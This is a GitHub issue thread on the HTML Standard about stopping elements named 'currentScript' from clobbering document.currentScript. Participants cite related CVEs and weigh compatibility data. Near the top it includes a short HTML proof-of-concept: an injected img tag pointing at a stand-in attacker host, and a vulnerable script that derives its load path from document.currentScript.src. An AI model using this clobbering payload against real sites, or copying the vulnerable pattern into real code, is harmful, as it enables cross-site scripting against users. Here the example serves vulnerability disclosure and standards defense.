whatwg / html

HTML Standard
https://html.spec.whatwg.org/multipage/
Other
8.1k stars 2.66k forks source link

Prevent currentScript from being overridden on document via name='' #10687

Open juj opened 1 week ago

juj commented 1 week ago

What is the issue with the HTML Standard?

It has been reported that an attacker that has DOM clobbering powers (weak), can potentially escalate it to XSS attack (stronger).

Several public CVEs have been reported, e.g.

https://vulert.com/vuln-db/CVE-2024-45389 https://github.com/advisories/GHSA-gcx4-mw62-g8wm https://nvd.nist.gov/vuln/detail/CVE-2024-45812 https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986

These all revolve around the fact that

<html><body>
<img name='currentScript' src='http://bad.attacker.site.com/foo.js'>
<script>
var script = document.createElement('script');
var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/'));
script.src = `${scriptDir}/sibling.js`;
</script></body></html>

That is, if attacker has the power to inject a DOM element with name='currentScript' (like add an image in a forum in an unsafely implemented manner), and if the site then uses document.currentScript.src to infer what the path to the current script is, to load another script relative to it, an attacker has the capability to elevate their DOM clobber into a XSS opportunity.

I raised this in https://github.com/whatwg/dom/issues/1315 where it was closed as duplicate of https://github.com/whatwg/html/issues/2212.

The ticket https://github.com/whatwg/html/issues/2212 discussed a general opt-out solution, though it feels that a) a solution to this security aspect should not be opt-out, and b) dealing with the specific pattern of document.currentScript alone would be worth it, as that would plug that whole class of CVEs linked above from being able to occur.

Progress in https://github.com/whatwg/html/issues/2212 has been slow due to concerns of site breakage. I think it would be safe to argue that preventing <img name='currentScript' src='http://bad.attacker.site.com/foo.js'> from overwriting document.currentScript, i.e. handling the overwrite of name='currentScript' alone should not have these backwards compatibility concerns of site breakage, and would be possible to be undertaken separately from https://github.com/whatwg/html/issues/2212, which is currently in the progress of acquiring user statistics?

Reading the linked CVEs, it looks like that would cover all the CVEs above, and stop any future CVEs from this category from being possible. It would also prevent weird interactions in downstream libraries, like https://github.com/emscripten-core/emscripten/pull/22688, from needing to take place.

Would it be ok to blacklist name='currentScript' on its own from replacing document.currentScript? What do you think?

annevk commented 1 week ago

currentScript currently only works for classic scripts (i.e., not for module scripts) and only as long as they are found in the document tree (i.e., not when they are in a shadow tree).

While I suppose we could add a special case for it in Document object's named getter, it's not really an API that universal scripts ought to be using anyway. I guess I wouldn't oppose some kind of push for this, but it's not clear to me it's worth the effort.

Sec-ant commented 1 week ago

document.currentScript presents in the outputs of widely used bundle tools like: webpack / rollup / vite / rspack / tsup / modern.js / umi, and wasm compiling and packing tools like emscripten / wasm-bindgen. I believe many can benefit if this is prevented from the source.

WebReflection commented 1 week ago

it's not really an API that universal scripts ought to be using anyway

we use it a lot in PyScript, as scripts there (the only valid data node we could use 'cause Custom Elements won't work the same) might need it, so we need to grab it and forward it to the underlying WASM interpreter.

All I am saying is that use cases for it are more common than you think (or measure, as I think you measure only JS code and not WASM related code too).

WebReflection commented 1 week ago

on a side note, we also run WASM in workers where document makes no sense (we provide it) and currentScript makes even less sense ... so maybe there's something to think about in the emscripten and wasm-bindgen side of affairs, happy to help there if needed.

juj commented 1 week ago

it's not really an API that universal scripts ought to be using anyway

Looking at MDN: document.currentScript there are no markings of the API being deprecated or obsoleted. This comment is the first I hear about this sentiment. If using document.currentScript is outdated, there is no way today for developers to discover that they should no longer be using it. Especially if we are calling it outdated on grounds of potential security problems, such a conclusion should be widely publicized in the spec and/or MDN as a deprecation warning.

Also, using modules is not a drop-in replacement to many projects, but can require extensive code refactoring - so getting developers to migrate is not a quick feat.

it's not clear to me it's worth the effort

In the infosec community, it looks like publishing CVEs based on this <img name='currentScript'> privilege escalation is fair game, and based on the closing notes in this comment ("while checking [CVE] alerts across my projects"), I get an impression that automated JS code security scanners flag uses of document.currentScript.src because of this DOM clobbering pattern. It was clearly worth to them, and I do think that the common "zero-value CVE reports" argument does not apply here. (the behavior was highly surprising when I first read about this)

In that light, I think it would be worthwhile for WhatWG to tend to this, rather than leaving it to all site developers and the above listed middleware vendors to individually learn about and argue if it's a legitimate thing or not. The downsides seem practically nonexistent?

annevk commented 1 week ago

I'm not opposed to someone driving this. https://whatwg.org/working-mode#changes describes the rough process. If there is someone willing to take this on (and this can be literally anyone, including everyone who participated in this thread thus far; the WHATWG community consists of everyone who participates in the development of its standards after all) I suppose we could label this issue agenda+ to gauge implementer interest.

@whatwg/documentation perhaps it's worthwhile documenting that currentScript also does not work inside of shadow trees. And that it has generally fallen out of favor as per the note in the HTML Standard and https://github.com/whatwg/html/issues/1013.

WebReflection commented 1 week ago

If there is someone willing to take this on I suppose we could label this issue agenda+ to gauge implementer interest.

it's a security concern and a source of doom for the current state of the modern Web so I hope someone will try to fix it sooner than later.

juj commented 1 week ago

I have a little bit of experience for creating WPT tests from the interaction we had before. To get going, I added a WPT test at https://github.com/web-platform-tests/wpt/pull/48536 . Of course to be merged only after implementers agree.

juj commented 1 week ago

I tried to search where in the HTML spec the connection of DOM element name='foo' -> document.foo is made. I found only this: https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#naming-form-controls:-the-name-attribute

though that relates to forms, and does not mention the document object.

Should the HTML spec acquire some kind of wording about this somewhere?

juj commented 1 week ago

Filed implementation bugs at

annevk commented 1 week ago

Thanks @juj for taking this on! The named getter algorithm for Document objects is defined here (getter object (DOMString name); is the relevant bit in IDL): https://html.spec.whatwg.org/multipage/dom.html#dom-document-nameditem

smaug---- commented 1 week ago

Blocklisting only currentScript name would help with this one particular case. But if sites let one to include unsanitized html, one could still override many other features on document, and thus break the page. This is a well known, old issue, and I'd expect sites to sanitize the included html.

But it would be great if this could be fixed in some generic way. I think we need first data about how much sites rely on https://html.spec.whatwg.org/multipage/dom.html#dom-document-nameditem Or maybe https://chromestatus.com/metrics/feature/timeline/popularity/4872 is about that? That seems quite low (There is also https://chromestatus.com/metrics/feature/timeline/popularity/4873) One problem changing the current setup is that if one adds new properties to Document, those might break existing sites.

juj commented 1 week ago

Blocklisting only currentScript name would help with this one particular case.

Yes, that is right. Originally I too asked "let's fix all the cases" in https://github.com/whatwg/dom/issues/1315, but @annevk pointed out such a request was duplicate of https://github.com/whatwg/html/issues/2212 , which a) has been open since 2016 with no urgency, b) has a concern of breaking compatibility with existing sites, and c) was raised with no knowledge of being a security related request.

I'd expect sites to sanitize the included html.

Well, yes, after I saw this behavior: me too. I've been developing HTML/JS for well more than a decade and only learned about this behavior this week. When I did, I also expected that browsers would have sane behavior out of the box, i.e. that they would not allow document.currentScript to be overridden like this; but expecting others to do have done the sane thing doesn't always work out.

Given that the CVEs keep on coming, it does not seem that asking developers to sanitize would be the best approach (there will always be some who fail to do it, just like browser vendors have failed here), since it means that every developer has to learn about this issue independently, making it harder to write safe code out of the box.

This is a well known, old issue

I think this makes the problem more pertinent to solve, instead of diminishing/dismissing the trouble. Enough is enough?

it would be great if this could be fixed in some generic way

When I look at the CVEs, they all hinge on this one pattern that document.currentScript.src happens to collide with the .src property when a <img name='currentScript src='...'> is added. So in order to mute the CVEs from being possible, it is enough to get this document.currentScript hole plugged.

one could still override many other features on document, and thus break the page.

That is correct. In https://github.com/emscripten-core/emscripten/pull/22688#issuecomment-2399238660 I examined all the various ways that Emscripten content for example could be broken by using other names. But when looking at all the other names, there does not seem to exist a good way to escalate attack vectors. That is, the DOM clobering attack privilege fizzles to a Denial of Service attack, which is arguably a lesser problem than a XSS scripting attack, which all seems to revolve around document.currentScript.src. So I think tending to this one property as a special case does have value, and it can avoid the statistics gathering problem of https://github.com/whatwg/html/issues/2212.

zcorpan commented 1 week ago

I think it's worth investigating if it's possible to change this so that standard properties on document don't get shadowed.

To that end I queried httparchive to see which pages trigger the DOMClobberedShadowedDocumentPropertyAccessed use counter in Chrome, and then parsed those pages to find which properties used in the relevant elements' name and id attributes.

Findings:

There are 197 matching pages in the httparchive dataset (total number of pages is 12,098,307).

The name/id values and the number of pages with that value:

Name/ID Page Count
hidden 38
body 29
cookie 26
title 25
head 5
links 5
domain 5
images 4
all 2
forms 1

See https://github.com/zcorpan/document-clobbering-props for the methodology (I used chatgpt to help write the scripts) and https://github.com/zcorpan/document-clobbering-props/blob/main/results_categorized.csv for further compat analysis of individual pages. For example, for pages that have <form name=cookie>, do they really expect document.cookie to return the form element?